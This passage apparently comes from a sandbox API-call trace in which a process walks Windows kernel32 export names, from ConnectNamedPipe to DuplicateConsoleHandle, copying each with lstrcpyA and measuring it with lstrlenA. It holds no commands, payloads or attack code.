[0178.516] lstrcpyA (in: lpString1=0x239db58, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0178.516] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0178.516] lstrcpyA (in: lpString1=0x239db58, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0178.516] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0178.516] lstrcpyA (in: lpString1=0x239db58, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0178.516] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0178.516] lstrcpyA (in: lpString1=0x239db58, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0178.516] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0178.516] lstrcpyA (in: lpString1=0x239db58, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0178.516] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0178.516] lstrcpyA (in: lpString1=0x239db58, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0178.516] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0178.516] lstrcpyA (in: lpString1=0x239db58, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0178.517] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0178.517] lstrcpyA (in: lpString1=0x239db58, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0178.517] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0178.517] lstrcpyA (in: lpString1=0x239db58, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0178.517] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0178.517] lstrcpyA (in: lpString1=0x239db58, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0178.517] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0178.517] lstrcpyA (in: lpString1=0x239db58, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0178.517] lstrlenA (lpString="COPYCONTEXT") returned 11 [0178.517] lstrcpyA (in: lpString1=0x239db58, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0178.517] lstrlenA (lpString="COPYFILEA") returned 9 [0178.517] lstrcpyA (in: lpString1=0x239db58, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0178.517] lstrlenA (lpString="COPYFILEEXA") returned 11 [0178.517] lstrcpyA (in: lpString1=0x239db58, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0178.517] lstrlenA (lpString="COPYFILEEXW") returned 11 [0178.517] lstrcpyA (in: lpString1=0x239db58, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0178.517] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0178.517] lstrcpyA (in: lpString1=0x239db58, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0178.517] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0178.517] lstrcpyA (in: lpString1=0x239db58, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0178.517] lstrlenA (lpString="COPYFILEW") returned 9 [0178.517] lstrcpyA (in: lpString1=0x239db58, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0178.517] lstrlenA (lpString="COPYLZFILE") returned 10 [0178.517] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0178.517] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0178.517] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0178.517] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0178.517] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0178.517] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0178.517] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0178.517] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0178.517] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0178.517] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0178.517] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0178.517] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0178.517] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0178.518] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0178.518] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0178.518] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0178.518] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0178.518] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0178.518] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0178.518] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0178.518] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0178.518] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0178.518] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0178.518] lstrlenA (lpString="CREATEEVENTA") returned 12 [0178.518] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0178.518] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0178.518] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0178.518] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0178.518] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0178.518] lstrlenA (lpString="CREATEEVENTW") returned 12 [0178.518] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0178.518] lstrlenA (lpString="CREATEFIBER") returned 11 [0178.518] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0178.518] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0178.518] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0178.518] lstrlenA (lpString="CREATEFILEA") returned 11 [0178.518] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0178.518] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0178.518] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0178.518] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0178.518] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0178.518] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0178.518] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0178.518] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0178.518] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0178.518] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0178.518] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0178.518] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0178.518] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0178.518] lstrlenA (lpString="CREATEFILEW") returned 11 [0178.518] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0178.519] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0178.519] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0178.519] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0178.519] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0178.519] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0178.519] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0178.519] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0178.519] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0178.519] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0178.519] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0178.519] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0178.519] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0178.519] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0178.519] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0178.519] lstrlenA (lpString="CREATEJOBSET") returned 12 [0178.519] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0178.519] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0178.519] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0178.519] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0178.519] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0178.519] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0178.519] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0178.519] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0178.519] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0178.519] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0178.520] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0178.520] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0178.520] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0178.520] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0178.520] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0178.520] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0178.520] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0178.520] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0178.520] lstrcpyA (in: lpString1=0x239db58, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0178.520] lstrlenA (lpString="CREATEPIPE") returned 10 [0178.520] lstrcpyA (in: lpString1=0x239db58, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0178.520] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0178.520] lstrcpyA (in: lpString1=0x239db58, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0178.520] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0178.520] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0178.520] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0178.520] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0178.520] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0178.520] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0178.520] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0178.520] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0178.520] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0178.520] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0178.520] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0178.520] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0178.520] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0178.520] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0178.520] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0178.520] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0178.520] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0178.520] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0178.520] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0178.520] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0178.520] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0178.520] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0178.521] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0178.521] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0178.521] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0178.521] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0178.521] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0178.521] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0178.521] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0178.521] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0178.521] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0178.521] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0178.521] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0178.521] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0178.521] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0178.521] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0178.521] lstrlenA (lpString="CREATETHREAD") returned 12 [0178.521] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0178.521] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0178.521] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0178.521] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0178.521] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0178.521] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0178.521] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0178.521] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0178.521] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0178.521] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0178.521] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0178.521] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0178.521] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0178.521] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0178.521] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0178.521] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0178.521] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0178.521] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0178.521] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0178.521] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0178.521] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0178.521] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0178.521] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0178.522] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0178.522] lstrcpyA (in: lpString1=0x239db58, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0178.522] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0178.522] lstrcpyA (in: lpString1=0x239db58, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0178.522] lstrlenA (lpString="CTRLROUTINE") returned 11 [0178.522] lstrcpyA (in: lpString1=0x239db58, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0178.522] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0178.522] lstrcpyA (in: lpString1=0x239db58, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0178.522] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0178.522] lstrcpyA (in: lpString1=0x239db58, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0178.522] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0178.522] lstrcpyA (in: lpString1=0x239db58, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0178.522] lstrlenA (lpString="DEBUGBREAK") returned 10 [0178.522] lstrcpyA (in: lpString1=0x239db58, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0178.522] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0178.522] lstrcpyA (in: lpString1=0x239db58, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0178.522] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0178.522] lstrcpyA (in: lpString1=0x239db58, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0178.522] lstrlenA (lpString="DECODEPOINTER") returned 13 [0178.522] lstrcpyA (in: lpString1=0x239db58, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0178.522] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0178.522] lstrcpyA (in: lpString1=0x239db58, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0178.522] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0178.522] lstrcpyA (in: lpString1=0x239db58, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0178.522] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0178.522] lstrcpyA (in: lpString1=0x239db58, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0178.522] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0178.522] lstrcpyA (in: lpString1=0x239db58, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0178.522] lstrlenA (lpString="DELETEATOM") returned 10 [0178.522] lstrcpyA (in: lpString1=0x239db58, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0178.522] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0178.522] lstrcpyA (in: lpString1=0x239db58, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0178.522] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0178.522] lstrcpyA (in: lpString1=0x239db58, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0178.522] lstrlenA (lpString="DELETEFIBER") returned 11 [0178.522] lstrcpyA (in: lpString1=0x239db58, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0178.522] lstrlenA (lpString="DELETEFILEA") returned 11 [0178.522] lstrcpyA (in: lpString1=0x239db58, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0178.523] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0178.523] lstrcpyA (in: lpString1=0x239db58, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0178.523] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0178.523] lstrcpyA (in: lpString1=0x239db58, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0178.523] lstrlenA (lpString="DELETEFILEW") returned 11 [0178.523] lstrcpyA (in: lpString1=0x239db58, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0178.523] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0178.523] lstrcpyA (in: lpString1=0x239db58, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0178.523] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0178.523] lstrcpyA (in: lpString1=0x239db58, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0178.523] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0178.523] lstrcpyA (in: lpString1=0x239db58, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0178.523] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0178.523] lstrcpyA (in: lpString1=0x239db58, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0178.523] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0178.523] lstrcpyA (in: lpString1=0x239db58, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0178.523] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0178.523] lstrcpyA (in: lpString1=0x239db58, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0178.523] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0178.523] lstrcpyA (in: lpString1=0x239db58, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0178.523] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0178.523] lstrcpyA (in: lpString1=0x239db58, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0178.523] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0178.523] lstrcpyA (in: lpString1=0x239db58, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0178.523] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0178.523] lstrcpyA (in: lpString1=0x239db58, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0178.523] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0178.523] lstrcpyA (in: lpString1=0x239db58, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0178.523] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0178.523] lstrcpyA (in: lpString1=0x239db58, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0178.523] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0178.523] lstrcpyA (in: lpString1=0x239db58, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0178.523] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0178.523] lstrcpyA (in: lpString1=0x239db58, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0178.523] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0178.523] lstrcpyA (in: lpString1=0x239db58, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0178.523] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0178.523] lstrcpyA (in: lpString1=0x239db58, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0178.524] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0178.524] lstrcpyA (in: lpString1=0x239db58, 